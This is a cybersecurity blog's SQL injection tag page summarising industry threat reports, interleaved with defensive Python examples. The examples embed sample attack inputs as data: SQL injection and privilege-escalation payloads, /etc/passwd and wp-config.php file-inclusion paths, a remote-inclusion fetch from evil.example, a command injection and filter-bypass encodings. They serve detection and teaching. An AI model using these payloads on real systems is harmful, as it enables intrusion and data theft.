
Brian Pennington

A blog about Cyber Security & Compliance

Tag: SQL injection

DDoS attack activity soars

Akamai Technologies, Inc. announced the availability of the Q1 2015 State of the Internet – Security Report. The quarter’s report provides analysis and insight into the global cloud security threat landscape.


Q1 2015 set a record for the number of DDoS attacks observed across the Akamai PLXrouted network: more than double the number recorded in Q1 2014, and a jump of more than 35% compared to the previous quarter.

However, the attack profile has changed. Last year, high bandwidth and short duration attacks were the norm. But in Q1 2015, the typical DDoS attack was less than 10 gigabits per second (Gbps) and endured for more than 24 hours. There were eight mega-attacks in Q1, each exceeding 100 Gbps. While that was one fewer mega-attack than in Q4 2014, such large attacks were rarely seen a year ago. The largest DDoS attack observed in Q1 2015 peaked at 170 Gbps.

During the past year, DDoS attack vectors have also shifted. This quarter, Simple Service Discovery Protocol (SSDP) attacks accounted for more than 20% of the attack vectors, while SSDP attacks were not observed at all in Q1 or Q2 2014. SSDP comes enabled by default on millions of home and office devices including routers, media servers, web cams, smart TVs and printers to allow them to discover each other on a network, establish communication and coordinate activities. If left unsecured and/or misconfigured, these home-based, Internet-connected devices can be harnessed for use as reflectors.
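The reflection mechanism described above, as an added example that is not part of the Akamai report: the attacker sends an ordinary SSDP M-SEARCH probe (about 94 bytes) to exposed devices with the victim's address forged as the source, and every device answers the victim with a response many times larger. The flow records and addresses below are constructed for illustration; the thresholds are assumptions you would tune to your own network.

```python
from collections import defaultdict

SSDP_PORT = 1900

def msearch_probe(st: str = "ssdp:all") -> bytes:
    """Standard SSDP discovery request. A reflection attacker sends this over
    UDP/1900 with the victim's address spoofed as the source; every device
    behind a misconfigured gateway then answers the victim instead."""
    return (
        "M-SEARCH * HTTP/1.1\r\n"
        "HOST: 239.255.255.250:1900\r\n"
        'MAN: "ssdp:discover"\r\n'
        "MX: 1\r\n"
        f"ST: {st}\r\n\r\n"
    ).encode()

# Constructed flow records as a collector might export them:
# (src_ip, src_port, dst_ip, dst_port, bytes). 203.0.113.9 is the victim,
# 198.51.100.x are home devices abused as reflectors.
SAMPLE_FLOWS = [
    ("198.51.100.10", 1900, "203.0.113.9", 41000, 3200),
    ("198.51.100.11", 1900, "203.0.113.9", 41000, 2950),
    ("198.51.100.12", 1900, "203.0.113.9", 41000, 3100),
    ("198.51.100.13", 1900, "203.0.113.9", 41000, 2880),
    ("198.51.100.14", 1900, "203.0.113.9", 41000, 3300),
    ("192.0.2.7", 443, "203.0.113.9", 52110, 1400),        # ordinary HTTPS traffic
    ("198.51.100.10", 1900, "203.0.113.50", 1900, 300),    # a single, legitimate discovery reply
]

def detect_ssdp_reflection(flows, min_reflectors=3, min_amplification=5.0):
    """Group traffic sourced from UDP/1900 by destination. A destination that
    hears from many distinct reflectors, each sending far more bytes than the
    probe it was fed, is the target of a reflection attack. Returns a dict of
    victim -> {reflectors, amplification}."""
    probe_len = len(msearch_probe())
    per_victim = defaultdict(lambda: {"reflectors": set(), "bytes": 0})
    for src, sport, dst, _dport, nbytes in flows:
        if sport != SSDP_PORT:
            continue
        per_victim[dst]["reflectors"].add(src)
        per_victim[dst]["bytes"] += nbytes
    findings = {}
    for victim, stats in per_victim.items():
        n = len(stats["reflectors"])
        # Bytes received per byte the attacker had to send (one probe per reflector).
        amplification = stats["bytes"] / (probe_len * n)
        if n >= min_reflectors and amplification >= min_amplification:
            findings[victim] = {"reflectors": n, "amplification": round(amplification, 1)}
    return findings

if __name__ == "__main__":
    print(detect_ssdp_reflection(SAMPLE_FLOWS))
```

The same grouping works for any UDP reflection vector (NTP, DNS, CHARGEN) by changing the source port; the amplification ratio is what separates an attack from a burst of legitimate discovery replies.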

During Q1 2015, the gaming sector was once again hit with more DDoS attacks than any other industry. Gaming has remained the most targeted industry since Q2 2014, consistently being targeted in 35% of DDoS attacks. The software and technology sector was the second most targeted industry in Q1 2015, with 25% of the attacks.

Compared to Q1 2014

  • 116.5% increase in total DDoS attacks
  • 59.83% increase in application layer (Layer 7) DDoS attacks
  • 69.69% increase in infrastructure layer (Layer 3 & 4) DDoS attacks
  • 42.8% increase in the average attack duration: 24.82 vs. 17.38 hours

Compared to Q4 2014

  • 35.24% increase in total DDoS attacks
  • 22.22% increase in application layer (Layer 7) DDoS attacks
  • 36.74% increase in infrastructure layer (Layer 3 & 4) DDoS attacks
  • 15.37% decrease in average attack duration: 24.82 vs. 29.33 hours

A look at seven common web application attack vectors

For the Q1 2015 report, Akamai concentrated its analysis on seven common web application attack vectors, which accounted for 178.85 million web application attacks observed on the Akamai Edge network. These vectors were:

  1. SQL injection (SQLi)
  2. Local file inclusion (LFI)
  3. Remote file inclusion (RFI)
  4. PHP injection (PHPi)
  5. Command injection (CMDi)
  6. OGNL Java injection (JAVAi)
  7. Malicious file upload (MFU)

During Q1 2015, more than 66% of the web application attacks were attributed to LFI attacks. This was fueled by a massive campaign against two large retailers in March, targeting the WordPress RevSlider plugin.

SQLi attacks were also quite common, making up more than 29% of web application attacks. A substantial portion of the SQLi attacks was related to attack campaigns against two companies in the travel and hospitality industry. The other five attack vectors collectively made up the remaining 5% of attacks.
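The vector breakdown above comes from Akamai's own telemetry; as an added example (not Akamai's code), here is how the same seven vectors can be counted from an ordinary web server access log. The log lines are constructed; the first two mirror the publicly documented RevSlider local file inclusion request, and the patterns are narrow illustrations of each vector, not a complete rule set.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Ordered (vector, pattern) pairs; the first match wins, so the more specific
# vectors are tested before the broad LFI rule.
VECTOR_RULES = [
    ("RFI",   re.compile(r"=(?:https?|ftp)://", re.I)),
    ("CMDi",  re.compile(r"(?:;|\|\||&&|`)\s*(?:cat|ls|id|wget|curl|nc|sh|bash)\b", re.I)),
    ("SQLi",  re.compile(r"(?:'\s*(?:or|and)\s+[\w']+\s*=|union\s+(?:all\s+)?select|sleep\(\d+\)|--\s*$|;\s*drop\s)", re.I)),
    ("LFI",   re.compile(r"(?:\.\./|\.\.\\|/etc/passwd|wp-config\.php|php://)", re.I)),
    ("PHPi",  re.compile(r"(?:<\?php|eval\(|base64_decode\(|system\()", re.I)),
    ("JAVAi", re.compile(r"(?:%\{|\$\{)\s*(?:#|@)", re.I)),   # OGNL expression markers
    # Script uploads live in the request body, which access logs do not record;
    # the rule is listed for completeness and only fires if a body is supplied.
    ("MFU",   re.compile(r"filename=\"[^\"]+\.(?:php|phtml|jsp|asp)\"", re.I)),
]

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def classify_request(uri: str):
    """Decode the URI twice (to catch double-encoding) and return the name of
    the first matching vector, or None for a clean request."""
    decoded = unquote_plus(unquote_plus(uri))
    for vector, rule in VECTOR_RULES:
        if rule.search(decoded):
            return vector
    return None

def count_vectors(log_lines):
    """Parse Apache/nginx combined-format lines and tally attack vectors."""
    counts = Counter()
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        vector = classify_request(m.group("uri"))
        if vector:
            counts[vector] += 1
    return counts

# Constructed access log lines for illustration.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2015:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 1832',
    '198.51.100.7 - - [12/Mar/2015:10:01:03 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 904',
    '203.0.113.22 - - [12/Mar/2015:10:02:10 +0000] "GET /hotel/rooms.php?id=1%27+UNION+SELECT+username%2Cpassword+FROM+users-- HTTP/1.1" 500 512',
    '203.0.113.22 - - [12/Mar/2015:10:02:11 +0000] "GET /hotel/rooms.php?id=1%27+OR+%271%27%3D%271 HTTP/1.1" 200 7710',
    '192.0.2.5 - - [12/Mar/2015:10:03:00 +0000] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 404 210',
    '192.0.2.9 - - [12/Mar/2015:10:04:00 +0000] "GET /cgi-bin/ping.cgi?host=127.0.0.1;cat+/etc/passwd HTTP/1.1" 200 640',
    '192.0.2.10 - - [12/Mar/2015:10:05:00 +0000] "GET /products?category=shoes&page=2 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    print(count_vectors(SAMPLE_LOG))
```

Counting by source address rather than by vector is the quicker way to spot the kind of single-campaign skew Akamai describes: one or two IPs firing the same RevSlider request at thousands of hosts.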

The retail sector was the hardest hit by web application attacks, followed by the media and entertainment and hotel and travel sectors.

The growing threat of booter/stresser sites

The menu of easy-to-use attack vectors found in the DDoS-for-hire market can make it easy to dismiss the effectiveness of attackers who use them. A year ago, peak attack traffic from booter/stresser sites using these tactics typically measured 10-20 Gbps. Now these attack sites have become more dangerous, capable of launching attacks in excess of 100 Gbps. With new reflection attack methods such as SSDP being added continually, the potential damage from these sites is expected to keep increasing.

IPv6 adoption brings new security risks

IPv6 DDoS is not yet a common occurrence, but there are indications that malicious actors have started testing and researching IPv6 DDoS attack methods. A new set of risks and challenges associated with the transition to IPv6 are already affecting cloud providers as well as home and corporate network owners. Many IPv4 DDoS attacks can be replicated using IPv6 protocols, while some new attack vectors are directly related to the IPv6 architecture. Many of the features of IPv6 could enable attackers to bypass IPv4-based protections, creating a larger and possibly more effective DDoS attack surface. The Q1 security report outlines some of the risks and challenges that are ahead of us.

SQL injection attacks move beyond data theft

While SQL injection attacks have been documented since 1998, their uses have grown. The effects of these malicious queries can extend well beyond simple data exfiltration, potentially causing more damage than a data breach would have. These attacks can be used to elevate privileges, execute commands, infect or corrupt data, deny service, and more. Akamai researchers analyzed more than 8 million SQL injection attacks from Q1 2015 to uncover the most frequent methods and goals.
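The privilege-escalation and data-corruption cases above are worth seeing in working code. The following is an added example, not Akamai's, using Python's built-in sqlite3 driver and a constructed users table: the same "change my display name" feature written with string concatenation and then with bound parameters, fed the same payload.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """In-memory stand-in for an application's user table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, display TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", "Alice", "admin"), ("bob", "Bob", "user")])
    conn.commit()
    return conn

def set_display_name_vulnerable(conn, username: str, display: str) -> None:
    # Classic mistake: the user-controlled value is spliced into the statement text.
    sql = f"UPDATE users SET display = '{display}' WHERE username = '{username}'"
    conn.execute(sql)
    conn.commit()

def set_display_name_safe(conn, username: str, display: str) -> None:
    # Parameterised: values travel separately from the SQL, so the payload is
    # stored as a literal string and cannot change the statement's structure.
    conn.execute("UPDATE users SET display = ? WHERE username = ?", (display, username))
    conn.commit()

def role_of(conn, username: str) -> str:
    return conn.execute("SELECT role FROM users WHERE username = ?", (username,)).fetchone()[0]

def display_of(conn, username: str) -> str:
    return conn.execute("SELECT display FROM users WHERE username = ?", (username,)).fetchone()[0]

# A low-privileged user submits this as their new display name. Spliced into the
# vulnerable statement it closes the string, adds a second SET assignment,
# rewrites the WHERE clause and comments out the remainder:
#   UPDATE users SET display = 'Bob', role = 'admin' WHERE username = 'bob' -- ' WHERE ...
PRIVESC_PAYLOAD = "Bob', role = 'admin' WHERE username = 'bob' -- "

def demo() -> dict:
    vuln = make_db()
    set_display_name_vulnerable(vuln, "bob", PRIVESC_PAYLOAD)
    safe = make_db()
    set_display_name_safe(safe, "bob", PRIVESC_PAYLOAD)
    return {
        "vulnerable_role": role_of(vuln, "bob"),   # 'admin': no data left the database
        "safe_role": role_of(safe, "bob"),         # 'user': unchanged
        "safe_display": display_of(safe, "bob"),   # the payload itself, stored verbatim
    }

if __name__ == "__main__":
    print(demo())
```

Note that nothing was exfiltrated: the attacker simply rewrote a row, which is exactly the kind of outcome that perimeter DLP tuned for bulk data theft will never see.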

Website defacements and domain hijacking

Hundreds of web hosting companies provide web hosting for as little as a few dollars a month. In those cases, the hosting company may host multiple accounts on the same server. This can result in hundreds of domains and sites running under the same server IP address, potentially allowing malicious actors to hijack multiple web sites at once. Once one site has been compromised, a malicious actor can potentially traverse the server’s directories, potentially reading username and password lists, to access files from other customer accounts. This could include web site database credentials. With this information, attackers could gain the ability to change files on every site on the server.
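The cross-account read described above succeeds whenever one customer's configuration file is readable by every local account on the server. As an added example (not from the Akamai report), here is a small audit that walks a hosting tree and reports sensitive files with the "other" read bit set. The directory layout is constructed in a temporary folder; the list of file names to look for is an assumption you would extend for your own platforms.

```python
import os
import stat
import tempfile

# Files that routinely hold database credentials on shared PHP hosting (assumed list).
SENSITIVE_NAMES = {"wp-config.php", "configuration.php", "settings.php", ".env", ".htpasswd"}

def world_readable_secrets(root: str):
    """Return (relative path, mode) for every sensitive file under root that any
    other local account could read, i.e. whose 'other' read bit is set."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name not in SENSITIVE_NAMES:
                continue
            path = os.path.join(dirpath, name)
            mode = os.stat(path).st_mode
            if mode & stat.S_IROTH:
                findings.append((os.path.relpath(path, root), oct(stat.S_IMODE(mode))))
    return sorted(findings)

def build_sample_tree() -> str:
    """Constructed layout of two customer accounts on one shared server."""
    root = tempfile.mkdtemp(prefix="shared-hosting-")
    layout = {
        "site-a/public_html/wp-config.php": 0o644,  # readable by every account on the box
        "site-a/public_html/index.php": 0o644,
        "site-b/public_html/wp-config.php": 0o600,  # owner only
        "site-b/.env": 0o640,                        # owner and group only
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("DB_PASSWORD=example\n")   # constructed placeholder, not a real secret
        os.chmod(path, mode)
    return root

if __name__ == "__main__":
    for rel, mode in world_readable_secrets(build_sample_tree()):
        print(f"{mode} {rel}")
```

Fixing the mode is only half of it: the web server process must also run as a per-customer user (or under a PHP open_basedir restriction), otherwise a script in site-a still reads site-b's file with the server's own privileges.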

65% have experienced an SQL injection attack

The second DB Networks sponsored Ponemon Institute report on the SQL injection threat has been released.

The report explores what IT security professionals think about the likely attack chain of recent data breaches involving major retailers such as Target, Michaels and Neiman Marcus. The first report focused on how organizations respond to the SQL injection threat and their awareness about different approaches to managing this risk.

The study surveyed 595 individuals who work in IT and IT security. The majority of respondents are familiar with core IDS technologies that detect rogue SQL statements on the network that connects the web application to the database.

69% of respondents say their organization must comply with the Payment Card Industry Data Security Standard (PCI DSS). As such, a majority of the respondents are very familiar with, and required to comply with, the security requirements for retailers who accept payment cards.

SQL injections have been defined as being used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injections exploit security vulnerabilities in an application’s software. SQL injection is most commonly known as an attack vector through public facing websites but can be used to attack SQL databases in a variety of ways.

Background on retail breaches

Details of the recent retailer network intrusions and data breaches haven’t been readily forthcoming from either the retailers who were breached or the U.S. Secret Service, which is in charge of the breach investigations. As a result, security professionals are left to piece together the attack chain from the scant amount of information that has been shared thus far.

Target, for example, has revealed that the credentials of an HVAC contractor were compromised, and claims that those compromised credentials initiated the attack chain that ultimately resulted in two major breaches. While certainly an interesting factoid, that information actually offers little insight into the events that ultimately resulted in the breach of 40 million credit cards and another 70 million database records containing personally identifiable information (PII).

The HVAC vendor credentials only provided access to Target’s vendor billing and invoicing system. It’s a rather long leap from those systems into Target’s POS systems, and how that leap was made hasn’t been made public. Further, a report by BusinessWeek revealed that Target’s IT security systems identified the attackers’ suspicious activity multiple times during the attack, but those alerts were not acted upon by Target’s IT security staff.

Some of the key takeaways from this study include:

  • 50% of respondents believe cyber syndicates are to blame for the large retail data breaches. Only 16% believe an individual perpetrated the attack.
  • Many respondents believe notification of victims is better later than sooner. 36% of respondents would prefer to wait to notify victims until a thorough investigation was conducted.
  • SQL injection threat was one of the components of these retail breaches. 53% of respondents say SQL injections were used to steal sensitive and confidential information.
  • 65% of respondents say continuous monitoring of the database network followed by advanced database activity monitoring are the best approaches to avoiding a mega data breach
  • 33% of respondents say they either scan continuously or daily for active databases. However, 25% scan irregularly and 22% do not scan at all
  • SQL injection was considered by respondents to be one of the components of these attacks. 57% (36% + 21%) of respondents believe the likelihood that the attacks against the U.S. retailers involved SQL injection was 51% or greater
  • 65% of organizations represented in this study experienced a SQL injection attack that successfully evaded their perimeter defences in the last 12 months.
  • 49% say the SQL injection threat facing their company is very significant. On average, respondents believe 42% of all data breaches are due, at least in part, to SQL injections.
  • Many organizations are not familiar with the techniques used by cyber criminals.
  • 46% are familiar with the term Web Application Firewalls (WAF) bypass
  • 39% of respondents are very familiar or familiar with the techniques cybercriminals use to get around WAF perimeter security devices
  • BYOD makes understanding the root causes of an SQL injection threat more difficult. 56% of respondents say determining the root causes of SQL injection is becoming more difficult because of employees’ use of personally owned mobile devices (BYOD) in the workplace. Another challenge, according to 41% of respondents, is the increasing stealth and/or sophistication of cyber attackers
  • Expertise and the right technologies are critical to preventing the SQL injection threat. While respondents see the SQL threat as serious, only 31% say their organization’s IT security personnel possess the skills, knowledge and expertise to quickly detect SQL injection threats, and 34% agree that they have the technologies or tools to quickly detect a SQL injection threat

Find the report here

8 areas of computer security that have arisen during Data Breach investigations

The UK Information Commissioner’s Office (ICO) has identified eight important areas of computer security that have frequently arisen during their investigations of data breaches.

The eight areas are:-

  1. Software updates
  2. SQL injection (65% of organisations have been breached by a SQL Injection attack)
  3. Unnecessary services
  4. Decommissioning of software or services
  5. Password storage
  6. Configuration of SSL and TLS
  7. Inappropriate locations for processing data
  8. Default credentials

The ICO has provided advice for all eight areas. The report can be found here.

65% of organisations have been breached by a SQL Injection attack

Ponemon Institute have released their report The SQL Injection Threat Study, sponsored by DB Networks. The purpose of the research was to understand how organisations respond to the SQL injection threat and their awareness about different approaches to managing this risk.

The study surveyed 595 individuals who work in IT and IT security. The majority of respondents were familiar with core IDS technologies that detect rogue SQL statements on the network that connect the web application to the database.

SQL injections are defined as:-

being used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injections exploit security vulnerabilities in an application’s software. SQL injection is most commonly known as an attack vector through public facing websites but can be used to attack SQL databases in a variety of ways

Key findings extracted from the report:-

  • The SQL threat is taken seriously because 65% of organizations represented in this study experienced a SQL injection attack that successfully evaded their perimeter defences in the last 12 months.
  • 49% of respondents say the SQL injection threat facing their company is very significant. On average, respondents believe 42% of all data breaches are due, at least in part, to SQL injections.
  • Many organizations are not familiar with the techniques used by cyber criminals. 46% of respondents are familiar with the term Web Application Firewall (WAF) bypass. Only 39% of respondents are very familiar or familiar with the techniques cyber criminals use to get around WAF perimeter security devices.
  • BYOD makes understanding the root causes of an SQL injection attack more difficult. 56% of respondents say determining the root causes of SQL injection is becoming more difficult because of the trend for employees to use their personally owned mobile devices (BYOD) in the workplace. Another challenge, according to 41% of respondents, is increasing stealth and/or sophistication of cyber attackers.
  • Expertise and the right technologies are critical to preventing SQL injection attacks. While respondents see the SQL threat as serious, only 31% say their organization’s IT security personnel possess the skills, knowledge and expertise to quickly detect a SQL injection attack and 34% agree that they have the technologies or tools to quickly detect a SQL injection attack.
  • Measures to prevent SQL injection attacks are also lacking. Despite concerns about the threat, 52% do not take such precautions as testing and validating third party software to ensure it is not vulnerable to SQL injection attack.
  • Organizations move to a behavioural analysis solution to combat the SQL injection threat. 88% of respondents view behavioural analysis either very favourably or favourably.
  • 44% of respondents say their organization uses professional penetration testers to identify vulnerabilities in their information systems but only 35% of these organizations include testing for SQL injection vulnerabilities.
  • 20% continuously scan active databases, 13% do it daily, 25% scan irregularly and 22% do not scan at all.

The full report can be found here.

Europe’s Threat Landscape 2013 a report by ENISA

The EU’s cyber security Agency ENISA has issued its annual Threat Landscape 2013 report, where over 200 publicly available reports and articles have been analysed. 

Questions addressed are:

  • What are the top cyber-threats of 2013?
  • Who are the adversaries?
  • What are the important cyber-threat trends in the digital ecosystem?

Among the key findings is that cyber threats have gone mobile, and that adoption of simple security measures by end-users would reduce the number of cyber incidents worldwide by 50%.

The ENISA Threat Landscape presents the top current cyber threats of 2013 and identifies emerging trends. In 2013 important news stories, significant changes and remarkable successes have left their footprint in the cyber-threat landscape. Both negative and positive developments have formed the 2013 threat landscape. In particular:

Negative trends 2013:

  • Threat agents have increased the sophistication of their attacks and of their tools.
  • Clearly, cyber activities are not a matter of only a handful of nation states; indeed multiple states have developed the capacity to infiltrate both governmental and private targets.
  • Cyber-threats go mobile: attack patterns and tools targeting PCs which were developed a few years ago have now migrated to the mobile ecosystem.
  • Two new digital battlefields have emerged: Big Data and the Internet of Things.

Positive developments in the cyber threat trends in 2013 include:

  • Some impressive law-enforcement successes. Police arrested the gang responsible for the Police Virus; the Silk Road operator as well as the developer and operator of Blackhole, the most popular exploit kit, were also arrested.
  • Both the quality and number of reports as well as the data regarding cyber-threats have increased
  • Vendors gained speed in patching their products in response to new vulnerabilities.

The top three threats:

  1. Drive-by-downloads
  2. Worms/Trojans
  3. Code injections.

Key open issues, identified are:

  • End-users lack knowledge, yet they need to be actively involved. Adoption of simple security measures by end-users would reduce the number of cyber incidents worldwide by 50%!
  • Numerous actors work on overlapping issues of threat information collection and threat analysis. Greater coordination of information collection, analysis, assessment and validation among involved organisations is necessary.
  • The importance of increasing the speed of threat assessment and dissemination, by reducing detection and assessment cycles has been identified.

The Executive Director of ENISA, Professor Udo Helmbrecht remarked: “This threat analysis presents indispensable information for the cyber security community regarding the top threats in cyber-space, the trends, and how adversaries are setting up their attacks by using these threats.”

The full report can be found here.


PCI SSC releases its PCI DSS E-commerce Security Guidelines

Hot on the heels of the ATM Guidelines the PCI SSC has released the PCI DSS E-commerce Guidelines Information Supplement. 

The guidelines are designed to help e-commerce merchants to decide on which technologies and third party service providers to choose.

The e-commerce Special Interest Groups (SIGs) helped put the guidelines together and that meant using their knowledge of the marketplace to produce an industry specific document. 

“Take SQL injections as an example. This is not a new attack, and something we’ve known about in the industry for years. Yet it continues to be one of the most common methods by which e-commerce websites are compromised,” said Bob Russo, general manager, PCI Security Standards Council. “This can be addressed through simple, prudent coding practices, but merchants often don’t know where to start. These guidelines will help them better understand their responsibilities and the kinds of questions they need to ask of their service providers. In the case of SQL injections, one of the most important items to request of an e-commerce service provider is a description of the security controls and methods it has in place to protect websites against these vulnerabilities.”

The PCI DSS E-commerce Guidelines Information Supplement provides an introduction to e-commerce security and guidance around the following primary areas and objectives: 

  • E-commerce Overview – provides merchants and third parties with an explanation of typical e-commerce components and common implementations, and outlines high-level PCI DSS scoping guidance to be considered for each.
  • Common Vulnerabilities in E-commerce Environments – educates merchants on vulnerabilities often found in web applications (such as e-commerce shopping carts) so they can emphasize security when developing or choosing e-commerce software and services.
  • Recommendations – provides merchants with best practices to secure their e-commerce environments, as well as a list of recommended industry and PCI SSC resources to leverage in e-commerce security efforts.

The document also includes two appendices to address specific PCI DSS requirements and implementation scenarios:

  1. PCI DSS Guidance for E-commerce Environments – provides high-level e-commerce guidance that corresponds to the main categories of PCI DSS requirements; includes a chart to help organizations identify and document which PCI DSS responsibilities are those of the merchant and which are the responsibility of any e-commerce payment processor.
  2. Merchant and Third-Party PCI DSS Responsibilities – for outsourced or “hybrid” e-commerce environments, includes a sample checklist that merchants can use to identify which party is responsible for compliance and specify the details of the evidence of compliance.

“E-commerce continues to be a target for attacks on card data, especially with EMV technology helping drive so much of the face-to-face fraud down in Europe and other parts of the world,” said Jeremy King, European director, PCI Security Standards Council. “We are pleased with this guidance that will help merchants and others better understand how to secure this critical environment using the PCI Standards.”

For a link to the full document please use my PCI Resources page here.

Global Threat Report Quarter 1 2011


The Cisco Quarter 1 2011 Global Threat Report has been released. The Cisco Global Threat Report is a compilation of data collected across the four segments of Cisco Security: ScanSafe, IPS, RMS and IronPort.

The highlights for Quarter 1 2011 include:-

  • 105,536 unique Web malware were encountered in March 2011, a 46% increase from January 2011
  • Malicious webmail represented 7% of all Web-delivered malware in March 2011, a 391% increase from January 2011
  • 45% of all malicious webmail resulted from Yahoo! mail, 25% from Microsoft Live/Hotmail, and only 2% from Google’s Gmail
  • Search-engine-related traffic resulted in an average of 9% of all Web malware encountered in 1Q11
  • 33% of search engine encounters were via Google search engine results pages (SERPs), with 4% each from Yahoo! and Bing SERPs
  • SERPs and webmail encounters are impacted by the popularity of a particular service and are likely not indicative of any heightened risk specific to that service
  • Likejacking increased significantly during the first quarter of 2011, from 0.54% of all Web malware encounters in January 2011 to 6% in March 2011
  • At 13%, Miley Cyrus–themed likejacking scams beat out all other celebrities and events in March 2011. Likejacking themes for Indian actress Nayantara were at 7%, while Charlie Sheen was at 3%, Justin Bieber at 2%, and Lady Gaga at 1%
  • At 4% of all Web malware encounters in 1Q11, website compromises that attempted to download the Hiloti Trojan were the most frequently encountered, followed by malicious GIF injections (3%). Website compromises related to the Lizamoon series of SQL injection attacks represented just 0.15% of Web malware encounters for the quarter
  • Though far less successful than in years past, SQL injection attempts continued to be the most prevalent event firing (55%) observed by Cisco Remote Management Services in 1Q11
  • Malware activity related to the MyDoom worm was the 10th most frequently RMS-observed IPS event in 1Q11, demonstrating that legacy malware can still pose a threat to unprotected systems
  • As expected, Rustock activity declined significantly over 1Q11, but, interestingly, the sharp decline commenced weeks prior to the botnet takedown
  • Following 4Q10 declines, global spam volume increased and then subsequently decreased during 1Q11, but levels remained above that of December 2010
  • With an increase of 248%, Indonesia overtook the United States as the top spam-sending country in 1Q11

Cisco’s Top 10 Signature Findings Q1 2011

  Signature                                                                 Share of events
  Generic SQL Injection                                                     55.03%
  Web View Script Injection Vulnerability                                   7.01%
  Gbot Command and Control Over HTTP                                        5.16%
  B02K-UDP                                                                  5.20%
  Cisco Unified Videoconferencing Remote Command Injection                  4.91%
  Microsoft Internet Explorer Invalid Flag Reference Remote Code Execution  3.27%
  Windows MHTML Protocol Handler Script Execution                           2.47%
  WWW WinNT cmd.exe Access                                                  1.30%
  Web Application Security Test/Attack                                      1.19%
  MyDoom Virus Activity                                                     1.16%

Note that the MHTML vulnerability described in Microsoft KB 2501696, IntelliShield alert 22310, and Cisco Intrusion Prevention System (IPS) 6.0 – 33379/0 also appears on the Cisco RMS top 10 signature events list for 1Q11. Microsoft released an update for this former zero-day vulnerability in April 2011 (MS11-026).

While a significantly occurring event in 1Q11, SQL injection attempts remained at a fairly steady pace throughout the quarter with the only notable increase occurring in the latter part of March 2011.

Cisco RMS Top 10 by Port Activity

  Port   Percentage of events
  80     69%
  40436  2.23%
  25     2.17%
  161    1.39%
  5060   1.27%
  123    1.16%
  34227  1.13%
  443    1.05%
  21     1.00%
  20     0.71%

Although they represent a relatively small percentage of overall spam, phishing attacks pose a serious risk to security, both from a financial and sensitive information disclosure perspective. In 1Q11, attackers increasingly turned their attention toward phishing Twitter accounts.

This interest in Twitter credentials is likely due in part to Twitter users’ acceptance of shortened URLs. By compromising Twitter accounts, attackers can take advantage of shortened URLs to entice followers to visit malicious links the users might ordinarily view as suspicious. Such attacks are further fuelled by the trust engendered through social networking in general.

The report can be downloaded here


Eight must-fix flaws prior to an application penetration test

An excellent article by Neil O’Connor for SearchSecurity.

The full article is HERE, but Neil’s eight must-fix flaws are listed below:-

  1. Trusting client-side validation
  2. Blacklisting for input validation
  3. Improper error handling
  4. Forgotten/change password functionality
  5. Unencrypted communications/authentication
  6. Lack of auditing and logging
  7. Not reusing good security APIs or already tested code
  8. Not following Microsoft best practice development guides
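Items 1 and 2 of that list are worth seeing side by side. The following is an added example, not from Neil O’Connor’s article: a denylist validator of the kind many applications ship, run against constructed inputs that a tester would try on the server side, next to an allowlist that states what a field may contain. It assumes a MySQL back end (which treats an inline /**/ comment as whitespace) and a framework that URL-decodes each field once before the validator sees it.

```python
import re
from urllib.parse import unquote

# A denylist of the kind that is easy to write and easy to evade.
BLOCKED_WORDS = ("select", "union", "insert", "drop", "--", "'")

def blacklist_allows(value: str) -> bool:
    """Accept the input unless a forbidden token appears (case-insensitive)."""
    lowered = value.lower()
    return not any(word in lowered for word in BLOCKED_WORDS)

# An allowlist says what a field may contain instead of guessing what it may not.
USERNAME_RE = re.compile(r"^[a-z0-9_]{3,32}$")
ORDER_ID_RE = re.compile(r"^[0-9]{1,12}$")

def allowlist_allows(value: str, pattern: re.Pattern) -> bool:
    return pattern.fullmatch(value) is not None

# Constructed inputs. The denylist misses the second (MySQL reads /**/ as
# whitespace), the third (the quote is still encoded after one decode) and the
# fourth (no forbidden token at all); it only catches the textbook payload.
CASES = [
    ("bob_smith",                   "legitimate username"),
    ("1 UNI/**/ON SEL/**/ECT 1,2",  "inline-comment split keywords"),
    ("1%2527%20OR%201=1",           "double URL-encoded quote"),
    ("1 OR 1=1",                    "no blocked token at all"),
    ("bob' OR 1=1 --",              "textbook payload the denylist catches"),
]

def evaluate(cases=CASES):
    """Return, per input, what each strategy decides once the framework has
    URL-decoded the field a single time."""
    results = []
    for raw, note in cases:
        once_decoded = unquote(raw)
        results.append({
            "input": raw,
            "note": note,
            "blacklist": blacklist_allows(once_decoded),
            "allowlist": allowlist_allows(once_decoded, USERNAME_RE)
                         or allowlist_allows(once_decoded, ORDER_ID_RE),
        })
    return results

if __name__ == "__main__":
    for r in evaluate():
        print(f"{r['blacklist']!s:5} {r['allowlist']!s:5}  {r['input']!r:32} {r['note']}")
```

The allowlist rejects three inputs the denylist waves through, and it does so without knowing anything about SQL, which is the point: validation bounds the input, and parameterised queries stop whatever gets past it from becoming code.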

For PCI DSS the guidance for requirement 6.6 is:-

Attacks on web-facing applications are common and often successful, and are allowed by poor coding practices. This requirement for reviewing applications or installing web application firewalls is intended to greatly reduce the number of compromises on public facing web applications that result in breaches of cardholder data.

  • Manual or automated vulnerability security assessment tools or methods that review and/or scan for application vulnerabilities can be used to satisfy this requirement
